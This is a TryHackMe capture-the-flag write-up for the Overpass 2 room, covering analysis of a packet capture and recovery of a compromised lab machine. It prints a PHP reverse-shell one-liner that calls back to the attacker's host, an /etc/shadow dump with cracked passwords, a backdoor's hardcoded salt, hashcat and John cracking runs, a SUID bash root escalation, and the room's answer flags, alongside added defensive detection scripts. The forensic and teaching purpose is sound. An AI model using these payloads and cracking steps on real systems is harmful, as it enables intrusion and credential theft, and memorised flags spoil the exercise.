Overpass 2 - Hacked [TryHackMe]
2023-09-04
Introduction
Overpass 2 is a different kind of room from the previous ones: this time the goal is not to attack a target but to analyse an attack that has already happened and regain control of a machine that was compromised. The first part consists of analysing the network traffic captured in a pcapng file with Wireshark; once the method used by the attackers has been worked out, the second part is getting back into the box and collecting the flags.
Task 1 - Forensics - Analyse the PCAP
Step 1
- I download the pcapng file and open it in Wireshark.
- Going through the first packets, I find that the attackers use the upload form under /development to upload a PHP reverse shell.
- The payload used (a named-pipe reverse shell that calls back to 192.168.170.145 on port 4242) was:
<?php exec("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.170.145 4242 >/tmp/f")?>
Step 2
- The attackers read /etc/shadow and /etc/passwd to collect the system's users and password hashes.
- The password used to obtain privileged access was whenevernoteartinstant.
- I find that they fetch https://github.com/NinjaJc01/ssh-backdoor and clone the repository to build a persistence backdoor on the system.
Step 3
- The captured traffic also contains the full contents of /etc/shadow (the locked service accounts carry * instead of a hash):
❯ cat shadow.txt
root:*:18295:0:99999:7:::
daemon:*:18295:0:99999:7:::
bin:*:18295:0:99999:7:::
sys:*:18295:0:99999:7:::
sync:*:18295:0:99999:7:::
games:*:18295:0:99999:7:::
man:*:18295:0:99999:7:::
lp:*:18295:0:99999:7:::
mail:*:18295:0:99999:7:::
news:*:18295:0:99999:7:::
uucp:*:18295:0:99999:7:::
proxy:*:18295:0:99999:7:::
www-data:*:18295:0:99999:7:::
backup:*:18295:0:99999:7:::
list:*:18295:0:99999:7:::
irc:*:18295:0:99999:7:::
gnats:*:18295:0:99999:7:::
nobody:*:18295:0:99999:7:::
systemd-network:*:18295:0:99999:7:::
systemd-resolve:*:18295:0:99999:7:::
syslog:*:18295:0:99999:7:::
messagebus:*:18295:0:99999:7:::
_apt:*:18295:0:99999:7:::
lxd:*:18295:0:99999:7:::
uuidd:*:18295:0:99999:7:::
dnsmasq:*:18295:0:99999:7:::
landscape:*:18295:0:99999:7:::
pollinate:*:18295:0:99999:7:::
sshd:*:18464:0:99999:7:::
james:$6$7GS5e.yv$HqIH5MthpGWpczr3MnwDHlED8gbVSHt7ma8yxzBM8LuBReDV5e1Pu/VuRskugt1Ckul/SKGX.5PyMpzAYo3Cg/:18464:0:99999:7:::
paradox:$6$oRXQu43X$WaAj3Z/4sEPV1mJdHsyJkIZm1rjjnNxrY5c8GElJIjG7u36xSgMGwKA2woDIFudtyqY37YCyukiHJPhi4IU7H0:18464:0:99999:7:::
szymex:$6$B.EnuXiO$f/u00HosZIO3UQCEJplazoQtH8WJjSX/ooBjwmYfEOTcqCAlMjeFIgYWqR5Aj2vsfRyf6x1wXxKitcPUjcXlX/:18464:0:99999:7:::
bee:$6$.SqHrp6z$B4rWPi0Hkj0gbQMFujz1KHVs9VrSFu7AU9CxWrZV7GzH05tYPL1xRzUJlFHbyp0K9TAeY1M6niFseB9VLBWSo0:18464:0:99999:7:::
muirland:$6$SWybS8o2$9diveQinxy8PJQnGQQWbTNKeb2AiSp.i8KznuAjYbqI3q04Rf5hjHPer3weiC.2MrOj2o1Sw/fd2cu0kC6dUP.:18464:0:99999:7:::
- Running the five sha512crypt hashes through John the Ripper shows that 4 of the passwords are weak; only james's survives the wordlist. (John prints "Remaining 1 password hash" because the other four were already in its pot file from an earlier run, which is why this pass reports 0g but --show still lists four.)
❯ john hashes.txt --wordlist=/usr/share/wordlists/fasttrack.txt
Using default input encoding: UTF-8
Loaded 5 password hashes with 5 different salts (sha512crypt, crypt(3) $6$ [SHA512 256/256 AVX2 4x])
Remaining 1 password hash
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 24 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
0g 0:00:00:00 DONE (2023-09-04 00:03) 0g/s 7400p/s 7400c/s 7400C/s Spring2017..starwars
Session completed.
❯ john hashes.txt --show
paradox:secuirty3:18464:0:99999:7:::
szymex:abcd123:18464:0:99999:7:::
bee:secret12:18464:0:99999:7:::
muirland:1qaz2wsx:18464:0:99999:7:::
4 password hashes cracked, 1 left
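Two small triage helpers for the artefacts recovered in this task, added here as an example (this is not code from the original write-up or from TryHackMe): one pulls the attacker's callback address and the reverse-shell markers out of an uploaded body such as the PHP payload above, the other filters an exfiltrated /etc/shadow dump down to the accounts that actually have a crackable hash and identifies the crypt(3) scheme. The payload and the shadow excerpt are copied from the capture as shown above; the function names and the algorithm table are this example's own.

```python
"""Triage helpers for the artefacts recovered from the Overpass 2 capture.

Added example, not part of the original write-up. The payload string and the
shadow lines are the ones shown in the write-up; everything else is constructed.
"""
import re

# Reverse-shell payload observed in the POST to /development (from the capture).
PAYLOAD = (
    '<?php exec("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1'
    '|nc 192.168.170.145 4242 >/tmp/f")?>'
)

# Two common callback shapes: "nc [opts] HOST PORT" and bash's /dev/tcp/HOST/PORT.
_IP = r"(\d{1,3}(?:\.\d{1,3}){3})"
_CALLBACK_PATTERNS = [
    re.compile(r"\bnc(?:\.traditional)?\s+(?:-\w+\s+)*" + _IP + r"\s+(\d{1,5})"),
    re.compile(r"/dev/tcp/" + _IP + r"/(\d{1,5})"),
]
# Substrings that, taken together, are a strong signal of a fifo-based reverse shell.
_INDICATORS = ("mkfifo", "/bin/sh -i", "2>&1", "nc ", "/dev/tcp/", "exec(")


def extract_callback(body: str):
    """Return (ip, port) of the attacker's listener, or None if no callback is found."""
    for pat in _CALLBACK_PATTERNS:
        m = pat.search(body)
        if m:
            return m.group(1), int(m.group(2))
    return None


def reverse_shell_indicators(body: str):
    """List the reverse-shell markers present in an uploaded body (input for a detection rule)."""
    return [tok for tok in _INDICATORS if tok in body]


# Excerpt of the /etc/shadow exfiltrated in the capture (locked accounts carry '*').
SHADOW_DUMP = """\
root:*:18295:0:99999:7:::
sshd:*:18464:0:99999:7:::
james:$6$7GS5e.yv$HqIH5MthpGWpczr3MnwDHlED8gbVSHt7ma8yxzBM8LuBReDV5e1Pu/VuRskugt1Ckul/SKGX.5PyMpzAYo3Cg/:18464:0:99999:7:::
paradox:$6$oRXQu43X$WaAj3Z/4sEPV1mJdHsyJkIZm1rjjnNxrY5c8GElJIjG7u36xSgMGwKA2woDIFudtyqY37YCyukiHJPhi4IU7H0:18464:0:99999:7:::
"""

# crypt(3) prefix -> (scheme name, hashcat mode). Anything else is reported as unknown.
_CRYPT_IDS = {
    "$6$": ("sha512crypt", 1800),
    "$5$": ("sha256crypt", 7400),
    "$1$": ("md5crypt", 500),
}


def crackable_entries(shadow_text: str):
    """Return (user, hash, scheme, hashcat_mode) for accounts that have a real password hash.

    Entries whose hash field is empty or starts with '*' or '!' are locked or
    passwordless; feeding them to a cracker only wastes time.
    """
    out = []
    for line in shadow_text.splitlines():
        fields = line.split(":")
        if len(fields) < 2:
            continue
        user, h = fields[0], fields[1]
        if not h or h[0] in "*!":
            continue
        scheme, mode = _CRYPT_IDS.get(h[:3], ("unknown", None))
        out.append((user, h, scheme, mode))
    return out


def john_input(shadow_text: str) -> str:
    """Build the 'user:hash' file that john --wordlist= accepts (one line per account)."""
    return "\n".join(f"{u}:{h}" for u, h, _, _ in crackable_entries(shadow_text)) + "\n"


if __name__ == "__main__":
    print("callback:", extract_callback(PAYLOAD))
    print("indicators:", reverse_shell_indicators(PAYLOAD))
    for user, _, scheme, mode in crackable_entries(SHADOW_DUMP):
        print(f"{user}: {scheme} (hashcat -m {mode})")
```

Run on the full dump the script leaves exactly the five $6$ entries from the capture, which is the hashes.txt that John loaded above; the callback extractor is what you would wire into a WAF or Suricata rule to block the listener address while the box is being rebuilt.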
Task 2 - Research - Analyse the code
Step 4
- The backdoor's source contains the hash that will be checked at login, and the salt is appended to the password inside a function in the same file. Note that the hash variable below is only the default value in the source; the one the attacker actually launched the backdoor with shows up in the capture (see below). From main.go in the https://github.com/NinjaJc01/ssh-backdoor repository:
package main

import (
	"crypto/sha512"
	"fmt"
	"io"
	"io/ioutil"
	"log"
	"net"
	"os/exec"

	"github.com/creack/pty"
	"github.com/gliderlabs/ssh"
	"github.com/integrii/flaggy"
	gossh "golang.org/x/crypto/ssh"
	"golang.org/x/crypto/ssh/terminal"
)

var hash string = "bdd04d9bb7621687f5df9001f5098eb22bf19eac4c2c30b6f23efed4d24807277d0f8bfccb9e77659103d78c56e66d2d7d8391dfc885d0e9b68acd01fc2170e3"
- The salt is hardcoded in this part of the code, so it is the same for every deployment of the backdoor and adds nothing once the source is public:
func passwordHandler(_ ssh.Context, password string) bool {
	return verifyPass(hash, "1c362db832f3f864c8c2fe05f2002a05", password)
}
- In the captured packets I find the hash the attacker actually started the backdoor with:
6d05358f090eea56a238af02e47d44ee5489d234810ef6240280857ec69712a3e5e370b8a41899d0196ade16c0d54327c5654019292cbfe0b5e98ad1fec71bed
Step 5
- I put the hash and the salt together in a file (hash:salt) and run it through John the Ripper. John does not seem to crack it, so I switch to hashcat with mode 1710, sha512($pass.$salt), which is how the backdoor combines password and salt:
❯ hashcat -m 1710 password.txt -a 0 /usr/share/wordlists/rockyou.txt -o output.txt
hashcat (v6.2.6) starting

* Device #1: WARNING! Kernel exec timeout is not disabled.
             This may cause "CL_OUT_OF_RESOURCES" or related errors.
             To disable the timeout, see: https://hashcat.net/q/timeoutpatch
* Device #2: WARNING! Kernel exec timeout is not disabled.
             This may cause "CL_OUT_OF_RESOURCES" or related errors.
             To disable the timeout, see: https://hashcat.net/q/timeoutpatch
CUDA API (CUDA 12.0)
====================
* Device #1: NVIDIA GeForce RTX 4080, 15337/16077 MB, 76MCU

OpenCL API (OpenCL 3.0 CUDA 12.0.151) - Platform #1 [NVIDIA Corporation]
========================================================================
* Device #2: NVIDIA GeForce RTX 4080, skipped

OpenCL API (OpenCL 3.0 PoCL 4.0+debian Linux, None+Asserts, RELOC, SPIR, LLVM 15.0.7, SLEEF, DISTRO, POCL_DEBUG) - Platform #2 [The pocl project]
==================================================================================================================================================
* Device #3: cpu-haswell-13th Gen Intel(R) Core(TM) i7-13700KF, skipped

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256
Minimim salt length supported by kernel: 0
Maximum salt length supported by kernel: 256

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Optimizers applied:
* Zero-Byte
* Early-Skip
* Not-Iterated
* Single-Hash
* Single-Salt
* Raw-Hash
* Uses-64-Bit

ATTENTION! Pure (unoptimized) backend kernels selected.
Pure kernels can crack longer passwords, but drastically reduce performance.
If you want to switch to optimized kernels, append -O to your commandline.
See the above message to find out about the exact limits.

Watchdog: Temperature abort trigger set to 90c

Host memory required for this attack: 1334 MB

Dictionary cache built:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344392
* Bytes.....: 139921507
* Keyspace..: 14344385
* Runtime...: 0 secs

Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 1710 (sha512($pass.$salt))
Hash.Target......: 6d05358f090eea56a238af02e47d44ee5489d234810ef624028...002a05
Time.Started.....: Sun Sep 3 18:38:09 2023 (0 secs)
Time.Estimated...: Sun Sep 3 18:38:09 2023 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 206.9 MH/s (5.20ms) @ Accel:1024 Loops:1 Thr:64 Vec:1
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 4980736/14344385 (34.72%)
Rejected.........: 0/4980736 (0.00%)
Restore.Point....: 0/14344385 (0.00%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: 123456 -> nuquni89yHt
Hardware.Mon.#1..: Temp: 40c Fan: 0% Util: 31% Core:2505MHz Mem:10802MHz Bus:16

Started: Sun Sep 3 18:38:02 2023
Stopped: Sun Sep 3 18:38:10 2023

❯ cat output.txt
6d05358f090eea56a238af02e47d44ee5489d234810ef6240280857ec69712a3e5e370b8a41899d0196ade16c0d54327c5654019292cbfe0b5e98ad1fec71bed:1c362db832f3f864c8c2fe05f2002a05:november16
- The password is november16.
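To make the Step 4 and Step 5 reasoning concrete, here is the backdoor's password check re-implemented in Python, followed by the same dictionary attack hashcat ran. This is an added example, not code from the ssh-backdoor repository: the scheme is the one hashcat mode 1710 computes (sha512 over password followed by salt, hex-encoded), which the cracked result above confirms. The hash and salt are the ones recovered from the capture and from main.go; the five-word wordlist is constructed here in place of rockyou.

```python
"""Re-implementation of the backdoor's password check and a dictionary attack against it.

Added example, not the project's code. Assumes the scheme hashcat mode 1710
verified above: hex(sha512(password || salt)). The wordlist is constructed.
"""
import hashlib
import hmac

# Hash the attacker launched the backdoor with (from the capture).
CAPTURED_HASH = (
    "6d05358f090eea56a238af02e47d44ee5489d234810ef6240280857ec69712a3"
    "e5e370b8a41899d0196ade16c0d54327c5654019292cbfe0b5e98ad1fec71bed"
)
# Salt hardcoded in passwordHandler() in main.go.
HARDCODED_SALT = "1c362db832f3f864c8c2fe05f2002a05"


def backdoor_hash(password: str, salt: str) -> str:
    """hex(sha512(password || salt)): one fast, unsalted-per-user digest."""
    return hashlib.sha512((password + salt).encode()).hexdigest()


def verify_pass(stored_hash: str, salt: str, password: str) -> bool:
    """The check the backdoor performs at SSH login.

    compare_digest is used here so the comparison itself does not leak through
    timing; that is a choice of this example, not a statement about the original.
    """
    return hmac.compare_digest(backdoor_hash(password, salt), stored_hash)


def dictionary_attack(stored_hash: str, salt: str, candidates):
    """Try each candidate in order; return (password, attempts) or None.

    Because the salt is a constant published with the source, every deployment
    of this backdoor can be attacked with the same precomputed table, and a
    single SHA-512 per guess is what lets a GPU test hundreds of millions of
    candidates per second.
    """
    for attempts, cand in enumerate(candidates, start=1):
        if backdoor_hash(cand.rstrip("\r\n"), salt) == stored_hash:
            return cand, attempts
    return None


# Constructed stand-in for rockyou.txt; the real list needed ~5 million guesses.
WORDLIST = ["123456", "password", "letmein", "november16", "qwerty"]


if __name__ == "__main__":
    print(dictionary_attack(CAPTURED_HASH, HARDCODED_SALT, WORDLIST))
    print(verify_pass(CAPTURED_HASH, HARDCODED_SALT, "november16"))
```

Contrast this with the sha512crypt hashes in /etc/shadow: John reported a cost of 5000 iterations per guess and a different salt per user, which is why james's password held out while the backdoor's fell to rockyou in under a second at 206 MH/s.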
Task 3 - Attack - Get back in!
Step 6
- The attackers left their signature on the website: opening it shows H4ck3d by CooctusClan.
- Using the information gathered, I SSH in through the backdoor listening on port 2222 with the cracked password november16 (the backdoor serves an RSA host key, so ssh-rsa has to be re-enabled on the client), then abuse a SUID copy of bash left in james's home directory to get root, following the technique listed on GTFOBins (bash -p keeps the effective uid instead of dropping it):
❯ ssh -oHostKeyAlgorithms=+ssh-rsa james@10.10.55.155 -p 2222
The authenticity of host '[10.10.55.155]:2222 ([10.10.55.155]:2222)' can't be established.
RSA key fingerprint is SHA256:z0OyQNW5sa3rr6mR7yDMo1avzRRPcapaYwOxjttuZ58.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '[10.10.55.155]:2222' (RSA) to the list of known hosts.
james@10.10.55.155's password:
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.

james@overpass-production:/home/james/ssh-backdoor$ ll
total 6584
drwxrwxr-x 3 james james    4096 Jul 22  2020 ./
drwxr-xr-x 7 james james    4096 Jul 22  2020 ../
drwxrwxr-x 8 james james    4096 Jul 21  2020 .git/
-rw-rw-r-- 1 james james     109 Jul 21  2020 README.md
-rwxrwxr-x 1 james james 6634961 Jul 21  2020 backdoor*
-rw-rw-r-- 1 james james     362 Jul 22  2020 backdoor.service
-rw-rw-r-- 1 james james     104 Jul 21  2020 build.sh
-rw-rw-r-- 1 james james   60102 Jul 21  2020 cooctus.png
-rw------- 1 james james    1679 Jul 21  2020 id_rsa
-rw-r--r-- 1 james james     407 Jul 21  2020 id_rsa.pub
-rw-rw-r-- 1 james james     815 Jul 21  2020 index.html
-rw-rw-r-- 1 james james    2788 Jul 21  2020 main.go
-rw-rw-r-- 1 james james     241 Jul 21  2020 setup.sh
james@overpass-production:/home/james/ssh-backdoor$ cd
bash: cd: HOME not set
james@overpass-production:/home/james/ssh-backdoor$ cd /home/james
james@overpass-production:/home/james$ ll
total 1136
drwxr-xr-x 7 james james    4096 Jul 22  2020 ./
drwxr-xr-x 7 root  root     4096 Jul 21  2020 ../
lrwxrwxrwx 1 james james       9 Jul 21  2020 .bash_history -> /dev/null
-rw-r--r-- 1 james james     220 Apr  4  2018 .bash_logout
-rw-r--r-- 1 james james    3771 Apr  4  2018 .bashrc
drwx------ 2 james james    4096 Jul 21  2020 .cache/
drwx------ 3 james james    4096 Jul 21  2020 .gnupg/
drwxrwxr-x 3 james james    4096 Jul 22  2020 .local/
-rw------- 1 james james      51 Jul 21  2020 .overpass
-rw-r--r-- 1 james james     807 Apr  4  2018 .profile
-rw-r--r-- 1 james james       0 Jul 21  2020 .sudo_as_admin_successful
-rwsr-sr-x 1 root  root  1113504 Jul 22  2020 .suid_bash*
drwxrwxr-x 3 james james    4096 Jul 22  2020 ssh-backdoor/
-rw-rw-r-- 1 james james      38 Jul 22  2020 user.txt
drwxrwxr-x 7 james james    4096 Jul 21  2020 www/
james@overpass-production:/home/james$ cat user.txt
thm{d119b4fa8c497ddb0525f7ad200e6567}

james@overpass-production:/home$ find / -perm -u=s -type f 2>/dev/null
/usr/bin/chsh
/usr/bin/sudo
/usr/bin/chfn
/usr/bin/pkexec
/usr/bin/traceroute6.iputils
/usr/bin/newuidmap
/usr/bin/newgidmap
/usr/bin/passwd
/usr/bin/gpasswd
/usr/bin/at
/usr/bin/newgrp
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
/usr/lib/eject/dmcrypt-get-device
/bin/mount
/bin/fusermount
/bin/su
/bin/ping
/bin/umount
/home/james/.suid_bash
james@overpass-production:/home$

james@overpass-production:/home$ /home/james/.suid_bash -p
.suid_bash-4.4# whoami
root
.suid_bash-4.4#

.suid_bash-4.4# cd /root
.suid_bash-4.4# ls
root.txt
.suid_bash-4.4# cat root.txt
thm{d53b2684f169360bb9606c333873144d}
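The find command above is the manual version of the check a responder wants to run on a compromised host (or on a mounted image of it): list every set-uid file and flag the ones that do not live where distribution packages install them. The script below is an added example, not part of the original write-up. The allow-list of packaged directories is this example's own assumption drawn from the find output above, and the sample filesystem tree is constructed in a temporary directory so the script runs offline; point suid_files at "/" to run it for real.

```python
"""Hunt for SUID binaries planted outside the packaged system paths.

Added example for the recovery step above, not part of the original write-up.
PACKAGED_DIRS is an assumption to be tuned per host; the sample tree is constructed.
"""
import os
import shutil
import stat
import tempfile

# Directories where packaged SUID helpers normally live (assumption based on the find output).
PACKAGED_DIRS = ("/usr/bin", "/usr/lib", "/usr/sbin", "/bin", "/sbin")


def suid_files(root: str):
    """Return system-style paths (as if root were '/') of regular files under root with the set-uid bit.

    Uses lstat so symlinks are not followed, and skips entries that vanish or
    cannot be read while walking; with root='/' this mirrors find / -perm -u=s -type f.
    """
    found = []
    for dirpath, _dirs, names in os.walk(root):
        for name in names:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                rel = os.path.relpath(path, root).replace(os.sep, "/")
                found.append("/" + rel)
    return sorted(found)


def suspicious_suid(paths, packaged_dirs=PACKAGED_DIRS):
    """Keep only SUID files outside the packaged directories.

    A root-owned SUID copy of bash in a home directory, like /home/james/.suid_bash
    in this room, is exactly the persistence artefact this isolates.
    """
    def is_packaged(p):
        return any(p == d or p.startswith(d + "/") for d in packaged_dirs)
    return [p for p in paths if not is_packaged(p)]


def build_sample_tree() -> str:
    """Constructed sample image: one packaged SUID helper and one planted SUID shell."""
    root = tempfile.mkdtemp(prefix="overpass-img-")
    layout = (
        ("usr/bin/sudo", 0o4755),            # legitimate, packaged
        ("home/james/.suid_bash", 0o4755),   # planted persistence
        ("home/james/user.txt", 0o644),      # ordinary file, no SUID
    )
    for rel, mode in layout:
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "wb") as f:
            f.write(b"#!/bin/sh\n")
        os.chmod(path, mode)
    return root


if __name__ == "__main__":
    img = build_sample_tree()
    try:
        found = suid_files(img)
        print("suid files:", found)
        print("suspicious:", suspicious_suid(found))
    finally:
        shutil.rmtree(img)
```

Once a planted SUID binary is confirmed, the rest of the persistence set in this room (the backdoor binary, backdoor.service and the attacker's id_rsa in ssh-backdoor/) should be removed together, and the leaked /etc/shadow hashes treated as burned: every account in that dump needs a new password, not only the four John cracked.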
Conclusion
The approach in this machine was different from the others, posing the challenge from the point of view of a security analyst in a SOC. By analysing the network traffic we were able to work out what kind of attack the attackers carried out, and we used that information to take back control of the compromised host and restore it.